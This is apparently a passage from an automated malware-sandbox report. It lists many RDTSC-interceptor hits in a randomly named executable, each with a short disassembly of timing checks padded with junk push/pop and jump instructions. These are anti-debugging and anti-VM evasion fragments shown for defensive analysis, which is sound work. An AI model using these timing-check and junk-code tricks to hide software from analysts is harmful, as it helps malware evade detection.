Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EB5D57 second address: EB5D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EB5FFF second address: EB6022 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8C24FD04C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F8C24FD04D1h 0x0000000f jne 00007F8C24FD04CEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EB6182 second address: EB6187 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: E5F8C7 second address: E5F8CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EB66FA second address: EB6704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F8C2504F386h 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EB6704 second address: EB672A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F8C24FD04C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F8C24FD04D7h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBF916 second address: EBF939 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F399h 0x00000007 js 00007F8C2504F386h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBF939 second address: EBF957 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8C24FD04C8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop ebx 0x00000012 ja 00007F8C24FD04CCh 0x00000018 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBF957 second address: EBF965 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8C2504F388h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBF965 second address: EBF96B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBF96B second address: EBF96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBD823 second address: EBD83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C24FD04D3h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBD83B second address: EBD845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F8C2504F386h 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBD845 second address: EBD870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C24FD04D5h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ebx 0x0000000f js 00007F8C24FD04C6h 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBDA0E second address: EBDA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C2504F38Fh 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBDA21 second address: EBDA30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jnl 00007F8C24FD04C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBDD32 second address: EBDD36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBDD36 second address: EBDD46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F8C24FD04C6h 0x00000010 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBDD46 second address: EBDD63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F8C2504F38Eh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBE01B second address: EBE021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBE5BD second address: EBE5E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F38Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8C2504F390h 0x00000010 jmp 00007F8C2504F38Ch 0x00000015 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBEEFF second address: EBEF32 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F8C24FD04D3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jp 00007F8C24FD04C6h 0x00000012 jmp 00007F8C24FD04D2h 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBEF32 second address: EBEF38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBEF38 second address: EBEF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C24FD04CDh 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBEF49 second address: EBEF75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F38Bh 0x00000007 jmp 00007F8C2504F399h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBEF75 second address: EBEF8A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F8C24FD04C6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EBEF8A second address: EBEF8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EC2B94 second address: EC2BA8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007F8C24FD04C6h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jbe 00007F8C24FD04C6h 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EC2BA8 second address: EC2BE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8C2504F38Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 jmp 00007F8C2504F393h 0x00000015 pop ecx 0x00000016 pushad 0x00000017 jnl 00007F8C2504F386h 0x0000001d push edx 0x0000001e pop edx 0x0000001f je 00007F8C2504F386h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EC2BE2 second address: EC2BED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F8C24FD04C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EC2BED second address: EC2C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8C2504F386h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8C2504F395h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EC2C11 second address: EC2C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EC2EBF second address: EC2EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EC2EC7 second address: EC2ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EC2ECD second address: EC2ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EC3624 second address: EC3638 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e jg 00007F8C24FD04C6h 0x00000014 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECFF48 second address: ECFF4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECFF4C second address: ECFF89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8C24FD04CCh 0x0000000c jmp 00007F8C24FD04D3h 0x00000011 jmp 00007F8C24FD04D6h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECE0F5 second address: ECE10B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F38Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECE252 second address: ECE257 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECE257 second address: ECE263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8C2504F386h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECE263 second address: ECE26E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECE679 second address: ECE67D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECE7D8 second address: ECE7DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECE7DE second address: ECE7E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECE967 second address: ECE999 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8C24FD04ECh 0x00000008 jmp 00007F8C24FD04D7h 0x0000000d jmp 00007F8C24FD04CFh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECE999 second address: ECE99F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECE99F second address: ECE9A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECEC2B second address: ECEC31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECEC31 second address: ECEC35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECEC35 second address: ECEC39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ECFDB5 second address: ECFDBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED3E40 second address: ED3E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C2504F396h 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED8D0E second address: ED8D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED8692 second address: ED86C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C2504F396h 0x00000009 pushad 0x0000000a popad 0x0000000b jc 00007F8C2504F386h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 jo 00007F8C2504F386h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED8832 second address: ED8837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED89A1 second address: ED89A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED89A7 second address: ED89C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8C24FD04D6h 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED89C4 second address: ED89C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED89C8 second address: ED89D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F8C24FD04C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED89D4 second address: ED89E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8C2504F386h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED89E0 second address: ED89E6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED89E6 second address: ED8A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007F8C2504F397h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push edx 0x00000015 pop edx 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F8C2504F38Dh 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: ED8A1E second address: ED8A4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8C24FD04CCh 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F8C24FD04D3h 0x00000011 popad 0x00000012 js 00007F8C24FD04CEh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE64D1 second address: EE64D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE64D5 second address: EE64DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE64DB second address: EE64E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE64E7 second address: EE653F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8C24FD04CAh 0x00000008 jc 00007F8C24FD04F5h 0x0000000e jmp 00007F8C24FD04D9h 0x00000013 jmp 00007F8C24FD04D6h 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jp 00007F8C24FD04CAh 0x00000022 pushad 0x00000023 jnp 00007F8C24FD04C6h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE653F second address: EE654C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F8C2504F386h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE619C second address: EE61A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE61A2 second address: EE61CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8C2504F393h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8C2504F38Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE61CE second address: EE61D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE61D2 second address: EE61D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE61D6 second address: EE61DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE61DC second address: EE61E3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE61E3 second address: EE61EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE61EC second address: EE61F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE89C6 second address: EE89D1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE89D1 second address: EE89D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE89D7 second address: EE89E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE89E2 second address: EE89E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EE89E8 second address: EE89EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EEF47A second address: EEF486 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\iofolko5\lenTsqDIajevXTuJaJ03oKGb.exe RDTSC instruction interceptor: First address: EEF486 second address: EEF4BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8C24FD04CDh 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jmp 00007F8C24FD04D8h 0x00000010 jmp 00007F8C24FD04CBh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
